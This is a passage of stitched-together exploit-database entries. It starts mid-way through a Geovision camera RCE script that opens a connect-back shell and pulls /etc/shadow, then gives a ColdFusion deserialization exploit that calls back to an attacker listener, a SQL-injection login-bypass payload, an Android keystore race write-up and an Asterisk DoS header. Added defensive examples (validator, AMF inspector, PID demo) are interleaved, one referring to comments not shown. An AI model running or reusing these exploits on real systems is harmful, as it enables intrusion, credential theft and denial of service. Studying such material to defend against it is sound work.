                    response = HTTPconnect(self.rhost,self.proto,self.verbose,self.credentials,self.raw_request,self.noexploit).Send(URI,self.headers,self.query_args,self.SessionID)
                    print "[i] Sleeping..."
                    time.sleep(5)
                    print "[>] Disabling ipfilter"
                    self.query_args = {
                        "szIpAddr":"",
                        "byOpId":"0",
                        "dwSelIndex":"0",
                    }
                    response = HTTPconnect(self.rhost,self.proto,self.verbose,self.credentials,self.raw_request,self.noexploit).Send(URI,self.headers,self.query_args,self.SessionID)
                    for Remove in range(0,4):
                        print "[>] Deleting ipfilter Entry: {}".format(Remove+1)
                        self.query_args = {
                            "bPolicy":"0", # 1 = Enable, 0 = Disable
                            "Delete":"Remove",
                            "szIpAddr":"",
                            "byOpId":"0",
                            "dwSelIndex":"0",
                        }
                        response = HTTPconnect(self.rhost,self.proto,self.verbose,self.credentials,self.raw_request,self.noexploit).Send(URI,self.headers,self.query_args,self.SessionID)
                    CMD_LEN = 0
                # OLD Way
                else:
                    for Remove in range(0,4):
                        print "[>] Deleting ipfilter Entry: {}".format(Remove+1)
                        self.query_args = {
                            "bPolicy":"0", # 1 = Enable, 0 = Disable
                            "Delete":"Remove",
                            "szIpAddr":"",
                            "byOpId":"0",
                            "dwSelIndex":"0",
                        }
                        response = HTTPconnect(self.rhost,self.proto,self.verbose,self.credentials,self.raw_request,self.noexploit).Send(URI,self.headers,self.query_args,self.SessionID)
                    CMD_LEN = 0
            if NEW_IP_FILTER:
                print "[i] Last sending"
                print "[>] Enabling ipfilter"
                self.query_args = {
                    "bPolicy":"1", # 1 = Enable, 0 = Disable
                    "szIpAddr":"",
                    "byOpId":"0", # 0 = Allow, 1 = Deny
                    "dwSelIndex":"0",
                }
                response = HTTPconnect(self.rhost,self.proto,self.verbose,self.credentials,self.raw_request,self.noexploit).Send(URI,self.headers,self.query_args,self.SessionID)
                print "[i] Sleeping..."
                time.sleep(5)
                print "[>] Disabling ipfilter"
                self.query_args = {
                    "szIpAddr":"",
                    "byOpId":"0",
                    "dwSelIndex":"0",
                }
                response = HTTPconnect(self.rhost,self.proto,self.verbose,self.credentials,self.raw_request,self.noexploit).Send(URI,self.headers,self.query_args,self.SessionID)
                for Remove in range(0,4):
                    print "[>] Deleting ipfilter Entry: {}".format(Remove+1)
                    self.query_args = {
                        "bPolicy":"0", # 1 = Enable, 0 = Disable
                        "Delete":"Remove",
                        "szIpAddr":"",
                        "byOpId":"0",
                        "dwSelIndex":"0",
                    }
                    response = HTTPconnect(self.rhost,self.proto,self.verbose,self.credentials,self.raw_request,self.noexploit).Send(URI,self.headers,self.query_args,self.SessionID)
            print "[!] Enjoy the shell... "
            return True
        except Exception as e:
            if not NEW_IP_FILTER:
                print "[i] Last sending"
                for Remove in range(0,4):
                    print "[>] Deleting ipfilter Entry: {}".format(Remove+1)
                    self.query_args = {
                        "bPolicy":"0", # 1 = Enable, 0 = Disable
                        "Delete":"Remove",
                        "szIpAddr":"",
                        "byOpId":"0",
                        "dwSelIndex":"0",
                    }
                    response = HTTPconnect(self.rhost,self.proto,self.verbose,self.credentials,self.raw_request,self.noexploit).Send(URI,self.headers,self.query_args,self.SessionID)
                print "[!] Enjoy the shell... "
                return True
            print "[!] Hmm... {}".format(e)
            print response.read()
            return True

    def GeoToken(self):
        print "[i] GeoToken PoC to login and download /etc/shadow via token symlink"
        print "[!] You must have valid login and password to generate the symlink"
        try:
            #########################################################################################
            # This is how to list remote *.wav and *.avi files in /storage.
            """
            print "[>] Requesting token1"
            URI = '/BKCmdToken.php'
            response = HTTPconnect(rhost,proto,verbose,credentials,raw_request,noexploit).Send(URI,headers,None,None)
            result = json.load(response)
            if verbose:
                print json.dumps(result,sort_keys=True,indent=4, separators=(',', ': '))
            print "[i] Request OK?: {}".format(result['success'])
            if not result['success']:
                sys.exit(1)
            token1 = result['token']
            #
            # SAMPLE OUTPUT
            #
            #{
            #    "success": true,
            #    "token": "6fe1a7c1f34431acc7eaecba646b7caf"
            #}
            #
            # Generate correct MD5 token2
            token2 = hashlib.md5(hashlib.md5(token1 + 'gEo').hexdigest() + 'vIsIon').hexdigest()
            query_args = {
                "token1":token1,
                "token2":token2
            }
            print "[>] List files"
            URI = '/BKFileList.php'
            response = HTTPconnect(rhost,proto,verbose,credentials,raw_request,noexploit).Send(URI,headers,query_args,None)
            result = json.load(response)
            if verbose:
                print json.dumps(result,sort_keys=True,indent=4, separators=(',', ': '))
            for who in result.keys():
                print len(who)
            #
            # SAMPLE OUTPUT
            #
            #{
            #    "files": [
            #        {
            #            "file_size": "2904170",
            #            "filename": "event20171105104946001.avi",
            #            "remote_path": "/storage/hd11-1/GV-MFD1501-0a99a9/cam01/2017/11/05"
            #        },
            #        {}
            #    ]
            #}
            #########################################################################################
            """
            # Request remote MD5 token1
            print "[>] Requesting token1"
            URI = '/BKCmdToken.php'
            response = HTTPconnect(self.rhost,self.proto,self.verbose,self.credentials,self.raw_request,self.noexploit).Send(URI,self.headers,None,None)
            result = json.load(response)
            if verbose:
                print json.dumps(result,sort_keys=True,indent=4, separators=(',', ': '))
            print "[i] Request OK?: {}".format(result['success'])
            if not result['success']:
                return False
            token1 = result['token']
            #
            # SAMPLE OUTPUT
            #{
            #    "success": true,
            #    "token": "6fe1a7c1f34431acc7eaecba646b7caf"
            #}
            #
            #
            # Generate correct MD5 token2
            #
            # MD5 Format: <login>:<token1>:<password>
            #
            token2 = hashlib.md5(username + ':' + token1 + ':' + password).hexdigest()
            #
            # symlink this file for us
            #
            filename = '/etc/shadow'
            self.query_args = {
                "token1":token1,
                "token2":token2,
                "filename":filename
            }
            print "[>] Requesting download file link"
            URI = '/BKDownloadLink.cgi'
            response = HTTPconnect(self.rhost,self.proto,self.verbose,self.credentials,self.raw_request,self.noexploit).Send(URI,self.headers,self.query_args,None)
            response = response.read()#[:900]
            response = response.replace("'", "\"")
            result = json.loads(response)
            print "[i] Request OK?: {}".format(result['success'])
            if not result['success']:
                return False
            if verbose:
                print json.dumps(result,sort_keys=True,indent=4, separators=(',', ': '))
            #
            # SAMPLE OUTPUT
            #
            #{
            #    "dl_folder": "/tmp",
            #    "dl_token": "C71689493825787.dltoken",
            #    "err_code": 0,
            #    "success": true
            #}
            #
            URI = '/ssi.cgi' + result['dl_folder'] + '/' + result['dl_token']
            print "[>] downloading ({}) with ({})".format(filename,URI)
            response = HTTPconnect(self.rhost,self.proto,self.verbose,self.credentials,self.raw_request,self.noexploit).Send(URI,self.headers,self.query_args,None)
            response = response.read()
            print response
            return True
        except Exception as e:
            print "[i] GEO Token fail ({})".format(e)
            return False

if __name__ == '__main__':
    #
    # Help, info and pre-defined values
    #
    INFO = '[Geovision Inc. IPC/IPV RCE PoCs (2017 bashis <mcw noemail eu>)]\n'
    HTTP = "http"
    HTTPS = "https"
    proto = HTTP
    verbose = False
    noexploit = False
    raw_request = True
    rhost = '192.168.57.20' # Default Remote HOST
    rport = '80' # Default Remote PORT
    lhost = '192.168.57.1' # Default Local HOST
    lport = '1337' # Default Local PORT
    # creds = 'root:pass'
    credentials = False
    #
    # Geovision stuff
    #
    SessionID = str(int(random.random() * 100000))
    DumpSettings = False
    deviceinfo = False
    GEOtoken = False
    anonymous = False
    filtersetting = False
    usersetting = False
    jpegstream = False
    picturecatch = False
    # Geovision default
    username = 'admin'
    password = 'admin'
    #
    # Try to parse all arguments
    #
    try:
        arg_parser = argparse.ArgumentParser(
            prog=sys.argv[0],
            description=('[*] '+ INFO +' [*]'))
        arg_parser.add_argument('--rhost', required=True, help='Remote Target Address (IP/FQDN) [Default: '+ rhost +']')
        arg_parser.add_argument('--rport', required=True, help='Remote Target HTTP/HTTPS Port [Default: '+ rport +']')
        arg_parser.add_argument('--lhost', required=False, help='Connect Back Address (IP/FQDN) [Default: '+ lhost +']')
        arg_parser.add_argument('--lport', required=False, help='Connect Back Port [Default: '+ lport + ']')
        arg_parser.add_argument('--autoip', required=False, default=False, action='store_true', help='Detect External Connect Back IP [Default: False]')
        arg_parser.add_argument('--deviceinfo', required=False, default=False, action='store_true', help='Request model and firmware version')
        arg_parser.add_argument('-g','--geotoken', required=False, default=False, action='store_true', help='Try retrieve /etc/shadow with geotoken')
        arg_parser.add_argument('-a','--anonymous', required=False, default=False, action='store_true', help='Try pwning as anonymous')
        arg_parser.add_argument('-f','--filtersetting', required=False, default=False, action='store_true', help='Try pwning with FilterSetting.cgi')
        arg_parser.add_argument('-p','--picturecatch', required=False, default=False, action='store_true', help='Try pwning with PictureCatch.cgi')
        arg_parser.add_argument('-j','--jpegstream', required=False, default=False, action='store_true', help='Try pwning with JpegStream.cgi')
        arg_parser.add_argument('-u','--usersetting', required=False, default=False, action='store_true', help='Try pwning with UserSetting.cgi')
        arg_parser.add_argument('-d','--dump', required=False, default=False, action='store_true', help='Try pwning remote config')
        arg_parser.add_argument('--username', required=False, help='Username [Default: '+ username +']')
        arg_parser.add_argument('--password', required=False, help='password [Default: '+ password +']')
        if credentials:
            arg_parser.add_argument('--auth', required=False, help='Basic Authentication [Default: '+ credentials + ']')
        arg_parser.add_argument('--https', required=False, default=False, action='store_true', help='Use HTTPS for remote connection [Default: HTTP]')
        arg_parser.add_argument('-v','--verbose', required=False, default=False, action='store_true', help='Verbose mode [Default: False]')
        arg_parser.add_argument('--noexploit', required=False, default=False, action='store_true', help='Simple testmode; With --verbose testing all code without exploiting [Default: False]')
        args = arg_parser.parse_args()
    except Exception as e:
        print INFO,"\nError: {}\n".format(str(e))
        sys.exit(1)
    print "\n[*]",INFO
    if args.verbose:
        verbose = args.verbose
    #
    # Check validity, update if needed, of provided options
    #
    if args.https:
        proto = HTTPS
        if not args.rport:
            rport = '443'
    if credentials and args.auth:
        credentials = args.auth
    if args.geotoken:
        GEOtoken = args.geotoken
    if args.anonymous:
        anonymous = True
    if args.deviceinfo:
        deviceinfo = True
    if args.dump:
        DumpSettings = True
    if args.filtersetting:
        filtersetting = True # the flag checked below; the original assigned 'FilterSetting' here, so -f never selected the module
    if args.usersetting:
        usersetting = True
    if args.jpegstream:
        jpegstream = True
    if args.picturecatch:
        picturecatch = True
    if args.username:
        username = args.username
    if args.password:
        password = args.password
    if args.noexploit:
        noexploit = args.noexploit
    if args.rport:
        rport = args.rport
    if args.rhost:
        rhost = args.rhost
        IP = args.rhost
    if args.lport:
        lport = args.lport
    if args.lhost:
        lhost = args.lhost
    elif args.autoip:
        # HTTP check of our external IP
        try:
            headers = {
                'Connection': 'close',
                'Accept' : 'gzip, deflate',
                'Accept-Language' : 'en-US,en;q=0.8',
                'Cache-Control' : 'max-age=0',
                'User-Agent':'Mozilla'
            }
            print "[>] Trying to find out my external IP"
            lhost = HTTPconnect("whatismyip.akamai.com",proto,verbose,credentials,False,noexploit).Send("/",headers,None,None)
            if verbose:
                print "[Verbose] Detected my external IP:",lhost
        except Exception as e:
            print "[<] ",e
            sys.exit(1)
    # Check if RPORT is valid
    if not Validate(verbose).Port(rport):
        print "[!] Invalid RPORT - Choose between 1 and 65535"
        sys.exit(1)
    # Check if RHOST is valid IP or FQDN, get IP back
    rhost = Validate(verbose).Host(rhost)
    if not rhost:
        print "[!] Invalid RHOST"
        sys.exit(1)
    # Check if LHOST is valid IP or FQDN, get IP back
    lhost = Validate(verbose).Host(lhost)
    if not lhost:
        print "[!] Invalid LHOST"
        sys.exit(1)
    #
    # Validation done, start print out stuff to the user
    #
    if args.https:
        print "[i] HTTPS / SSL Mode Selected"
    print "[i] Remote target IP:",rhost
    print "[i] Remote target PORT:",rport
    if not args.geotoken and not args.dump and not args.deviceinfo:
        print "[i] Connect back IP:",lhost
        print "[i] Connect back PORT:",lport
    rhost = rhost + ':' + rport
    headers = {
        'Connection': 'close',
        'Content-Type' : 'application/x-www-form-urlencoded',
        'Accept' : 'gzip, deflate',
        'Accept-Language' : 'en-US,en;q=0.8',
        'Cache-Control' : 'max-age=0',
        'User-Agent':'Mozilla'
    }
    # Print Model and Firmware version
    Geovision(rhost,proto,verbose,credentials,raw_request,noexploit,headers,SessionID).DeviceInfo()
    if deviceinfo:
        sys.exit(0)
    # Geovision token login within the function
    #
    if GEOtoken:
        Geovision(rhost,proto,verbose,credentials,raw_request,noexploit,headers,SessionID).DeviceInfo()
        if not Geovision(rhost,proto,verbose,credentials,raw_request,noexploit,headers,SessionID).GeoToken():
            print "[!] Failed"
            sys.exit(1)
        else:
            sys.exit(0)
    if anonymous:
        if jpegstream:
            if not Geovision(rhost,proto,verbose,credentials,raw_request,noexploit,headers,SessionID).JpegStream(DumpSettings):
                print "[!] Failed"
                sys.exit(0)
        elif picturecatch:
            if not Geovision(rhost,proto,verbose,credentials,raw_request,noexploit,headers,SessionID).PictureCatch(DumpSettings):
                print "[!] Failed"
                sys.exit(0)
        else:
            print "[!] Needed: --anonymous [--picturecatch | --jpegstream]"
            sys.exit(1)
    else:
        #
        # Geovision Login needed
        #
        if usersetting:
            if Geovision(rhost,proto,verbose,credentials,raw_request,noexploit,headers,SessionID).Login():
                if not Geovision(rhost,proto,verbose,credentials,raw_request,noexploit,headers,SessionID).UserSetting(DumpSettings):
                    print "[!] Failed"
                    sys.exit(0)
        elif filtersetting:
            if Geovision(rhost,proto,verbose,credentials,raw_request,noexploit,headers,SessionID).Login():
                if not Geovision(rhost,proto,verbose,credentials,raw_request,noexploit,headers,SessionID).FilterSetting():
                    print "[!] Failed"
                    sys.exit(0)
        elif jpegstream:
            if Geovision(rhost,proto,verbose,credentials,raw_request,noexploit,headers,SessionID).Login():
                if not Geovision(rhost,proto,verbose,credentials,raw_request,noexploit,headers,SessionID).JpegStream(DumpSettings):
                    print "[!] Failed"
                    sys.exit(0)
        elif picturecatch:
            if Geovision(rhost,proto,verbose,credentials,raw_request,noexploit,headers,SessionID).Login():
                if not Geovision(rhost,proto,verbose,credentials,raw_request,noexploit,headers,SessionID).PictureCatch(DumpSettings):
                    print "[!] Failed"
                    sys.exit(0)
        else:
            print "[!] Needed: --usersetting | --jpegstream | --picturecatch | --filtersetting"
            sys.exit(1)
    sys.exit(0)
#
# [EOF]
#
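The FilterSetting.cgi comments above describe the root cause: a user-supplied ipfilter entry is stored to flash and later handed to `system()` unchanged. The following is an added example (not part of the PoC, not Geovision code) of the hardened form that handler should have taken: the entry is accepted only if it parses as an IPv4 address or CIDR range within the 31-character record limit noted above, and iptables is invoked with an argv list rather than a shell string. The path `/usr/local/bin/iptables` and the byOpId allow/deny mapping are taken from the PoC; the function names are this example's own.

```python
"""Hardened handling of an ipfilter entry (added example, not Geovision code)."""
import ipaddress
import re

MAX_ENTRY_LEN = 31  # 32nd byte must be NUL (flash record limit from the PoC comments)
IPTABLES = "/usr/local/bin/iptables"  # path quoted in the PoC comments

# Lexical gate first: digits, dots and at most one "/prefix". Nothing else is
# ever allowed through, so backticks, ';', '$' and quotes never reach storage.
_ENTRY_RE = re.compile(r"^\d{1,3}(\.\d{1,3}){3}(/\d{1,2})?$")


def validate_filter_entry(raw):
    """Return the canonical IPv4 network string for raw, or raise ValueError."""
    if not isinstance(raw, str) or len(raw) > MAX_ENTRY_LEN:
        raise ValueError("entry too long or not a string")
    if not _ENTRY_RE.match(raw):
        raise ValueError("entry is not an IPv4 address or CIDR range")
    # Semantic check: octets 0..255, prefix 0..32. strict=False accepts host
    # bits set in a range (1.2.3.4/8 -> 1.0.0.0/8); a bare host becomes /32.
    net = ipaddress.ip_network(raw, strict=False)
    return str(net)


def accepts(raw):
    """True if validate_filter_entry() accepts raw, False if it rejects it."""
    try:
        validate_filter_entry(raw)
        return True
    except ValueError:
        return False


def build_iptables_argv(entries, policy):
    """One argv list per validated entry; policy is 'allow' (byOpId 0) or 'deny' (byOpId 1).

    Returning argv lists means the caller runs subprocess.run(argv) with no
    shell at all, so even a validation bypass cannot become command execution.
    """
    target = {"allow": "ACCEPT", "deny": "DROP"}[policy]
    argv_list = []
    for raw in entries:
        net = validate_filter_entry(raw)
        argv_list.append([IPTABLES, "-A", "INPUT", "-s", net, "-j", target])
    return argv_list


def is_injection_attempt(raw):
    """Detection helper: True if an entry carries shell metacharacters.

    Meant for logging or alerting on requests of the kind the PoC sends;
    it is not a substitute for validate_filter_entry().
    """
    return bool(re.search(r"[`;$|&<>\"'\\\n]", raw or ""))
```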
# Exploit Title: Adobe Coldfusion BlazeDS Java Object Deserialization RCE
# Date: February 6, 2018
# Exploit Author: Faisal Tameesh (@DreadSystems)
# Company: Depth Security (https://depthsecurity.com)
# Version: Adobe Coldfusion (11.0.03.292866)
# Tested On: Windows 10 Enterprise (10.0.15063)
# CVE: CVE-2017-3066
# Advisory: https://helpx.adobe.com/security/products/coldfusion/apsb17-14.html
# Category: remote
# Notes:
# This is a two-stage deserialization exploit. The code below is the first stage.
# You will need a JRMPListener (ysoserial) listening at callback_IP:callback_port.
# After firing this exploit, and once the target server connects back,
# JRMPListener will deliver the secondary payload for RCE.
import struct
import sys
import requests

if len(sys.argv) != 5:
    print "Usage: ./cf_blazeds_des.py target_IP target_port callback_IP callback_port"
    quit()

target_IP = sys.argv[1]
target_port = sys.argv[2]
callback_IP = sys.argv[3]
callback_port = sys.argv[4]

# AMF0 envelope (version 3, no headers, one message with empty target/response
# URIs and unknown body length) switching to AMF3, whose top-level object is an
# externalizable sun.rmi.server.UnicastRef pointing at callback_IP:callback_port.
amf_payload = '\x00\x03\x00\x00\x00\x01\x00\x00\x00\x00\xff\xff\xff\xff\x11\x0a' + \
    '\x07\x33' + 'sun.rmi.server.UnicastRef' + struct.pack('>H', len(callback_IP)) + callback_IP + \
    struct.pack('>I', int(callback_port)) + \
    '\xf9\x6a\x76\x7b\x7c\xde\x68\x4f\x76\xd8\xaa\x3d\x00\x00\x01\x5b\xb0\x4c\x1d\x81\x80\x01\x00'

url = "http://" + target_IP + ":" + target_port + "/flex2gateway/amf"
headers = {'Content-Type': 'application/x-amf'}
response = requests.post(url, headers=headers, data=amf_payload, verify=False)
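The bytes above are an AMF0 envelope whose single message body switches to AMF3 and declares an externalizable object of class sun.rmi.server.UnicastRef, which is what BlazeDS then deserializes. As an added example (not part of the exploit and not BlazeDS code), here is a small inspector a gateway or WAF could run on a POST to /flex2gateway/amf before it reaches the endpoint: it walks the AMF0 envelope, reads the class name of the top-level AMF3 object in the first message body and fails closed on anything outside an allowlist. The allowlist prefixes and the function names are this example's assumptions; the packet layout follows the AMF0/AMF3 specifications.

```python
"""Minimal AMF envelope inspector (added example, not BlazeDS code)."""
import struct

# Assumption: legitimate Flex clients only send flex.messaging.* classes or
# the DSA/DSC/DSK aliases; adjust to the deployment's actual message types.
ALLOWED_CLASS_PREFIXES = ("flex.messaging.", "DSA", "DSC", "DSK")

AMF0_AVMPLUS = 0x11   # AMF0 marker: the value that follows is encoded as AMF3
AMF3_OBJECT = 0x0A    # AMF3 object marker


class AmfError(ValueError):
    """Raised on truncated or unsupported input; callers should fail closed."""


def _u29(buf, pos):
    """Decode an AMF3 U29 variable-length integer; return (value, new_pos)."""
    value = 0
    for i in range(4):
        if pos >= len(buf):
            raise AmfError("truncated U29")
        b = buf[pos]
        pos += 1
        if i < 3:
            value = (value << 7) | (b & 0x7F)
            if not b & 0x80:
                return value, pos
        else:                      # fourth byte contributes all 8 bits
            value = (value << 8) | b
    return value, pos


def _amf0_short_string(buf, pos):
    """AMF0 UTF-8 string with a 16-bit length prefix; return (text, new_pos)."""
    if pos + 2 > len(buf):
        raise AmfError("truncated string length")
    (n,) = struct.unpack_from(">H", buf, pos)
    pos += 2
    if pos + n > len(buf):
        raise AmfError("truncated string")
    return buf[pos:pos + n].decode("utf-8", "replace"), pos + n


def _amf3_top_class_name(buf, pos):
    """Class name of an inline AMF3 object at pos, or None if not an inline object."""
    if pos >= len(buf) or buf[pos] != AMF3_OBJECT:
        return None
    traits, pos = _u29(buf, pos + 1)
    # bit0 = inline value, bit1 = inline traits; anything else is a reference
    # into tables this inspector does not track (bit2 = externalizable).
    if traits & 0x03 != 0x03:
        return None
    name_hdr, pos = _u29(buf, pos)
    if not name_hdr & 1:           # string reference rather than inline text
        return None
    n = name_hdr >> 1
    if pos + n > len(buf):
        raise AmfError("truncated class name")
    return buf[pos:pos + n].decode("utf-8", "replace")


def inspect_amf(packet):
    """Parse an AMF0 request envelope; return version, messages and flagged classes."""
    buf = bytes(packet)
    if len(buf) < 6:
        raise AmfError("packet too short")
    version, header_count = struct.unpack_from(">HH", buf, 0)
    if header_count:
        raise AmfError("AMF headers not supported by this inspector")
    (message_count,) = struct.unpack_from(">H", buf, 4)
    pos = 6
    messages = []
    for _ in range(message_count):
        target, pos = _amf0_short_string(buf, pos)
        response, pos = _amf0_short_string(buf, pos)
        pos += 4                   # body length (0xFFFFFFFF = unknown)
        cls = None
        if pos < len(buf) and buf[pos] == AMF0_AVMPLUS:
            cls = _amf3_top_class_name(buf, pos + 1)
        messages.append({"target": target, "response": response, "class": cls})
        break                      # walking past the first body needs a full AMF3 decoder
    flagged = [m["class"] for m in messages
               if m["class"] and not m["class"].startswith(ALLOWED_CLASS_PREFIXES)]
    return {"version": version, "messages": messages, "flagged": flagged}


def should_block(packet):
    """Gateway decision: block on a flagged class or on anything unparseable."""
    try:
        return bool(inspect_amf(packet)["flagged"])
    except AmfError:
        return True


def build_envelope(class_name, extern=b""):
    """Constructed sample with the same envelope layout as the exploit above."""
    name = class_name.encode()
    body = bytes([AMF0_AVMPLUS, AMF3_OBJECT, 0x07, (len(name) << 1) | 1]) + name + extern
    return b"\x00\x03\x00\x00\x00\x01\x00\x00\x00\x00\xff\xff\xff\xff" + body


# Constructed test input mirroring the PoC: UnicastRef with a documentation-range callback.
SAMPLE_PACKET = build_envelope("sun.rmi.server.UnicastRef",
                               struct.pack(">H", 10) + b"192.0.2.10" + struct.pack(">I", 1099))
```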
# Exploit Title: Entrepreneur Dating Script 2.0.2 - Authentication Bypass
# Dork: N/A
# Date: 2018-02-07
# Exploit Author: Borna nematzadeh (L0RD) or borna.nematzadeh123@gmail.com
# Vendor Homepage: https://www.phpscriptsmall.com/product/entrepreneur-dating-script/
# Version: 2.0.2
# Category: Webapps
# CVE: N/A
# # # # #
# Description:
# With this exploit, an attacker can log in as any user without any authentication.
# # # # #
# Proof of Concept :
# 1) First, go to the login page.
# 2) Username : anything , Password : ' or 'x'='x
PoC Video :
http://s8.picofile.com/file/8318741292/Autentication_Bypass.mp4.html
Test : http://server/login.php?lerr
The keystore binder service ("android.security.IKeystoreService") allows users to issue several commands related to key management, including adding, removing, exporting and generating cryptographic keys. The service is accessible to many SELinux contexts, including application contexts, but also unprivileged daemons such as "media.codec".
Binder calls to this service are unpacked by IKeyStoreService (http://androidxref.com/8.0.0_r4/xref/system/security/keystore/IKeystoreService.cpp), and are then passed on to be processed by KeyStoreService. The "generateKey" command is handled by "KeyStoreService::generateKey" (http://androidxref.com/8.0.0_r4/xref/system/security/keystore/key_store_service.cpp#691). Here is a snippet from this function:
KeyStoreServiceReturnCode KeyStoreService::generateKey(const String16& name,
                                                       const hidl_vec<KeyParameter>& params,
                                                       const hidl_vec<uint8_t>& entropy, int uid,
                                                       int flags,
                                                       KeyCharacteristics* outCharacteristics) {
    uid = getEffectiveUid(uid);
    KeyStoreServiceReturnCode rc =
        checkBinderPermissionAndKeystoreState(P_INSERT, uid, flags & KEYSTORE_FLAG_ENCRYPTED);
    if (!rc.isOk()) {
        return rc;
    }
    if ((flags & KEYSTORE_FLAG_CRITICAL_TO_DEVICE_ENCRYPTION) && get_app_id(uid) != AID_SYSTEM) {
        ALOGE("Non-system uid %d cannot set FLAG_CRITICAL_TO_DEVICE_ENCRYPTION", uid);
        return ResponseCode::PERMISSION_DENIED;
    }

    if (containsTag(params, Tag::INCLUDE_UNIQUE_ID)) {
        if (!checkBinderPermission(P_GEN_UNIQUE_ID)) return ResponseCode::PERMISSION_DENIED;
    }
    ...
}
Like most KeyStore calls, this method uses "KeyStoreService::checkBinderPermission" in order to validate the calling process's permissions. This function uses a twofold approach to verify the caller (http://androidxref.com/8.0.0_r4/xref/system/security/keystore/key_store_service.cpp#checkBinderPermission):
1. The caller's UID is retrieved using IPCThreadState::self()->getCallingUid() and compared against an array of pre-populated UIDs and permissions ("user_perms")
1.1 If the UID matches any in the array, its permission set is retrieved from the array
1.2 If the UID isn't in the array, the default permission set is used ("DEFAULT_PERMS")
2. The caller's SELinux context is retrieved using getpidcon(...) using the PID from the binder transaction (IPCThreadState::self()->getCallingPid())
2.1 An SELinux access check is performed for the given context and operation
Specific to our case, if a "generateKey" command is called with an "INCLUDE_UNIQUE_ID" tag, the KeyStore will issue an attestation certificate for the generated key carrying an application-scoped, time-bounded device-unique ID. Since creating such attestation keys is a privileged operation, it should not be available to arbitrary callers.
This restriction is enforced using the SELinux context enforcement alone -- the "default" permission set ("DEFAULT_PERMS") contains the aforementioned permission:
static const perm_t DEFAULT_PERMS = static_cast<perm_t>(
P_GET_STATE | P_GET | P_INSERT | P_DELETE | P_EXIST | P_LIST | P_SIGN | P_VERIFY |
P_GEN_UNIQUE_ID /* Only privileged apps can do this, but enforcement is done by SELinux */);
As noted in the comment above, this API is restricted to "priv_app" SELinux contexts, which is enforced using validation #2 above.
However, using the calling PID in order to enforce access controls in binder calls is an invalid approach. This is because the calling process can transition from zombie to dead while the transaction is still being handled, freeing its PID for another process to take. Therefore, the following attack flow is possible:
1. Process A forks and creates process B
2. Process A cycles pids until it reaches the pid before its own
3. Process B issues a binder transaction for the KeyStore service, containing an INCLUDE_UNIQUE_ID tag
4. Process A kills process B, allowing it to transition to dead
5. Process A spawns a new "priv_app" instance, occupying process B's PID
If points 4-5 are completed before the KeyStore service performs the "getpidcon" call, the permission check will use the new app's SELinux context, allowing the access control checks to pass. Otherwise, since no ill effects happen if the race fails, an attacker can continue issuing calls until the race succeeds.
As for spawning a new "priv_app" instance, this can be achieved by issuing a query request to a content provider published by a "priv_app". Many such providers exist (the contacts provider, telephony provider, settings provider, etc.). In this case, I chose to use the "calendar" provider, as it was not running on the device to begin with (and therefore had to be spawned in order to handle the query request).
In order to expand the timing window for the PoC, I've added a "sleep" call to the KeyStore service's "generateKey" call. You can find the patch under "keystore.diff".
After applying the patch, the attached PoC should be built as part of the Android source tree, by extracting the source files into "frameworks/native/cmds/keystorerace", and running a build (e.g., "mmm keystorerace"). The resulting binary ("keystorerace") contains the PoC code. Running it should result in a new device-unique key being generated, despite not being executed from a "priv_app".
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/43996.zip
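The report's point is that identity looked up by PID after the fact (getpidcon) can describe a different process from the one that sent the request, whereas identity captured by the kernel at the trust boundary cannot. The following added example (not part of the report or its PoC) shows the two approaches side by side on a Unix socket: a child "caller" connects, sends a request and exits; the "service" reads the credentials the kernel recorded at connect time (SO_PEERCRED, the analogue of binder's getCallingUid) and then performs a getpidcon-style read of /proc/<pid>/attr/current after the caller has been reaped. Linux only; the abstract socket name and the request string are constructed for the demo.

```python
"""PID-keyed identity vs kernel-captured identity (added example, not AOSP code)."""
import os
import socket
import struct

REQUEST = b"generateKey INCLUDE_UNIQUE_ID"   # constructed sample request
SOCK_NAME = "\0keystore-race-demo-%d"        # Linux abstract namespace, per server pid


def lookup_context_by_pid(pid):
    """What getpidcon() does: read the SELinux label of whatever process owns pid now.

    Returns None when no such process exists (or the label is unreadable); when
    the PID has been recycled it would happily return the new occupant's label.
    """
    try:
        with open("/proc/%d/attr/current" % pid, "rb") as f:
            return f.read().rstrip(b"\0\n").decode() or "(no LSM label)"
    except OSError:
        return None


def peer_credentials(conn):
    """Caller identity captured by the kernel at connect() time: (pid, uid, gid)."""
    raw = conn.getsockopt(socket.SOL_SOCKET, socket.SO_PEERCRED, struct.calcsize("3i"))
    return struct.unpack("3i", raw)


def run_demo():
    """Spawn a short-lived caller and return both views of its identity."""
    server = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
    server.bind(SOCK_NAME % os.getpid())
    server.listen(1)

    child = os.fork()
    if child == 0:
        # Caller: connect, send the request, and vanish immediately, exactly the
        # window in which a PID-keyed check becomes unreliable.
        try:
            client = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
            client.connect(SOCK_NAME % os.getppid())
            client.sendall(REQUEST)
            client.close()
        finally:
            os._exit(0)

    conn, _ = server.accept()
    pid, uid, gid = peer_credentials(conn)          # fixed at connect(), survives caller exit
    request = conn.recv(64)
    label_while_alive = lookup_context_by_pid(pid)  # caller may already be a zombie here
    os.waitpid(child, 0)                            # caller reaped: its PID is free for reuse
    label_after_exit = lookup_context_by_pid(pid)   # getpidcon-style lookup now finds nothing
    conn.close()
    server.close()
    return {
        "request": request,
        "peer_pid": pid, "peer_uid": uid, "peer_gid": gid,
        "service_uid": os.getuid(),
        "pid_matches_child": pid == child,
        "label_while_alive": label_while_alive,
        "label_after_exit": label_after_exit,
    }


if __name__ == "__main__":
    for key, value in run_demo().items():
        print("%-20s %r" % (key, value))
```

The lesson for an access check is the one the report draws: decide on credentials the kernel attached to the transaction itself, never on a lookup keyed by a PID that may no longer belong to the sender.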
# Exploit Author: Juan Sacco <jsacco@exploitpack.com> - http://exploitpack.com
# Vulnerability found using Exploit Pack v10 - Fuzzer module
# CVE-2017-17090 - AST-2017-013
#
# Tested on: Asterisk 13.17.2~dfsg-2
#
# Description: Asterisk is prone to a remote, unauthenticated memory exhaustion
# vulnerability. The vulnerability is due to an error when the vulnerable application
# handles a crafted SCCP packet. A remote attacker may be able to exploit
# this to cause a denial of service condition on the affected system.
#
# [Nov 29 15:38:06] ERROR[7763] tcptls.c: TCP/TLS unable to launch
# helper thread: Cannot allocate memory
#
# Program: Asterisk is an Open Source PBX and telephony toolkit. It is, in a
# sense, middleware between Internet and telephony channels on the bottom,
# and Internet and telephony applications at the top.
#
# Homepage: http://www.asterisk.org/
